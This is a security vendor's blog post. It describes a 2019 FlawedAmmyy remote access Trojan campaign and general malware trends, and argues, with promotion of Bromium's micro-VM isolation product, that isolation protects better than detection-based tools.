Protect Before You Detect: FlawedAmmyy and the Case for Isolation
Posted by Ratnesh Pandey, Alex Holland and Toby Gray.
In June 2019, Microsoft issued warnings about a phishing campaign delivering a new variant of the FlawedAmmyy remote access Trojan (RAT), and a spike in the exploitation of CVE-2017-11882 in the wild. In this blog post we take a look at some of the weaknesses of detect-to-protect technologies such as anti-virus, endpoint detection and response (EDR) and anomaly detection systems, and how Bromium’s protect-before-you-detect technology addresses these weaknesses.
With detect-to-protect technologies that rely on signature updates, such as anti-virus, there is a time lag from when novel malware infects a system to when it can be detected because updating and deploying new signatures takes time. This time lag increases the dwell time that the malware is resident on a system, providing a window of opportunity to an adversary to act on their objectives.
Detection using behavioural analytics, as used by EDR, has the same flaw in that these solutions also rely on rule updates. Additionally, to get the best out of EDR, they typically require considerable tuning. Without investing considerable time and effort into creating a baseline of the monitored environment, EDR tools tend to generate a lot of false positives, particularly when trying to detect the malicious use of high risk living off the land binaries (LOLBins).
Many EDR solutions can contain infected devices from the rest of the network to stop lateral movement, but only after systems have been compromised, meaning that organisations still need to perform expensive eradication and recovery activities. Anomaly detection systems, such as those based on machine learning, also come with the penalty of remediation costs. Remediation can be an expensive affair because of the cost of conducting forensic investigations, rebuilding systems and lost productivity. Often companies pay more on remediation than the licensing cost of their security solutions.
According to Google Project Zero, it takes 15 days on average for a vendor to patch a zero-day vulnerability that is actively being exploited in the wild. Add to that the 20 days on average it takes for US federal departments to patch critical vulnerabilities and the result is that organisations are exposed to a significant window of vulnerability by zero-day exploits, even with good patch management.
Gartner recognises the value of application isolation to stop breaches. In a 2018 report, Gartner vice president Neil MacDonald argued that isolation and containment technologies are an important part of preventing damage from attacks.
Timeline of events – June 2019
Figure 1 – Timeline of notable security events in June 2019.
Here are a few of the malware trends we have observed in the first half of 2019:
- Downloaders that exploit old Windows vulnerabilities to achieve code execution, particularly CVE-2017-11882, CVE-2017-0199, CVE-2017-8570 and CVE-2018-0802.
- Malware that runs entirely in memory and does not save artefacts to disk (fileless malware).
- Malware that uses LOLBins to perform common malware functionality such as reconnaissance, persistence, and command and control (C2). LOLBins we regularly see include CertUtil, BITSAdmin, MSHTA and PowerShell.
- Malware signed with valid code-signing certificates to reduce the likelihood of being detected. A signed binary with a valid certificate is still considered as a marker of trust. We notice that attackers commonly abuse certificates from two certificate authorities, Thawte and Sectigo.
- Downloaders that check the language of the infected system to determine whether to download a secondary payload. Our colleague, Joe Darbyshire, recently looked at how attackers are using creative ways of determining the language settings of infected systems to target their malware to specific groups of users.
- The growing use of social media as an enabler of cybercrime by providing easy access to hacking tools, tutorials, expertise, including Malware as a Service (MaaS), to anyone who is willing to pay.
- Malware packed using polymorphic packers, which significantly change the signature of the binary.
One of the most common network security architectures is defence-in-depth (DID). The idea behind DID is to layer different security technologies to defend against common attack vectors, so that attacks missed by one technology are caught by another. There has been some work to measure the effectiveness of any given DID posture by calculating its qualities of depth, width and strength.
However, even after adopting the ideal “deep” and “narrow” DID posture, i.e. a posture that contains many security layers and minimises the number of possible attack paths (attack surface), some attacks still succeed. Additionally, DID is expensive because attack success shares an inverse relationship with the number of heterogeneous technologies (security layers) used to defend a network. Therefore, achieving the most effective DID posture is only realistic for organisations that have security budgets large enough to afford many security technologies. Unfortunately, this means that small and medium-sized enterprises are least likely to benefit from DID.
Bromium’s approach is to reduce the attack surface of the most common attack vectors so that organisations don’t need to increase the number of security layers in their networks to achieve better security. Bromium Secure Platform isolates user tasks on endpoints without disrupting the end user experience. For example, when a user clicks on an attachment containing a Word document, the document is opened inside a micro-VM, which has the same look and feel to the end user and with minimal impact on system performance.
If a document is malicious, it is fully contained in a micro-VM and the host isn’t compromised. Each micro-VM is a replica of an endpoint, created to run a single task. We delete the micro-VM after the task is completed, for instance after closing the Word document. Opening each task in a micro-VM provides an additional benefit of capturing forensic data associated with a threat and provides detailed analysis to help security teams understand the adversary’s intentions by showing what the malware tried to do on the endpoint at the time of execution.
FlawedAmmyy’s Encounter with Bromium
Microsoft alerted the security community of a fresh campaign spreading a new variant of FlawedAmmyy. The variant is notable for running in directly memory and was delivered via an .xls file. But while many people were figuring out how to defend their organisations from this latest variant, for Bromium customers, it was just a regular day. Bromium Secure Platform protects against malware from untrusted files (e.g. from email attachments, removable media and downloads from the web) by isolating tasks inside micro-VMs.
Below, is the video of the new FlawedAmmyy variant captured by Bromium Secure Platform. Since the malicious .xls file runs in a micro-VM, the host machine is protected from any malicious behaviour caused by opening the file.
Here’s what the video shows:
- Bromium Live View shows a list of active micro-VMs.
- We can see in Live View that the malicious .xls file is opened in a micro-VM.
- When the file is closed the micro-VM is destroyed, along with any malware.
- Forensic information is captured from the threat, including any behaviour mapped to the MITRE ATT&CK framework.
- A detailed view of high severity alerts raised during the lifetime of the micro-VM helps security teams to investigate the actions of the malware so that the motivations of the attacker can be understood.
Figure 2 – Demonstration of new FlawedAmmyy variant.
Figure 4 – High severity events raised during infection lifecycle.
Key Benefits of Bromium
- Every Bromium micro-VM is a honeypot that denies adversaries access to the host and their ability to move laterally. The guest mirrors the configuration of the host, using the same operating system, language, timezone, and version of Microsoft Office. This allows micro-VMs to closely mimic how the host would behave if it were compromised, turning them into a tool for deceiving adversaries, but with no risk of data loss. On multiple occasions we have upset red team engagements, who initially believe that they have compromised a host, only to discover after some frustration that their backdoors have been infecting a disposable micro-VM.
- Users are a weak link in security, and most people don’t understand the dangers lurking behind benign-looking email attachments and hyperlinks. It’s not fair to put the responsibility for attack prevention on the end-user. With Bromium, you don’t have to. Every untrusted hyperlink opens in a secure browser tab that is each contained within a micro-VM, helping to remove the guesswork from clicking on hyperlinks and attachments and lets users do their jobs unimpeded.
- Bromium saves organisations the incident response costs associated with containment, eradication and recovery.
Indicators of Compromise (IOCs)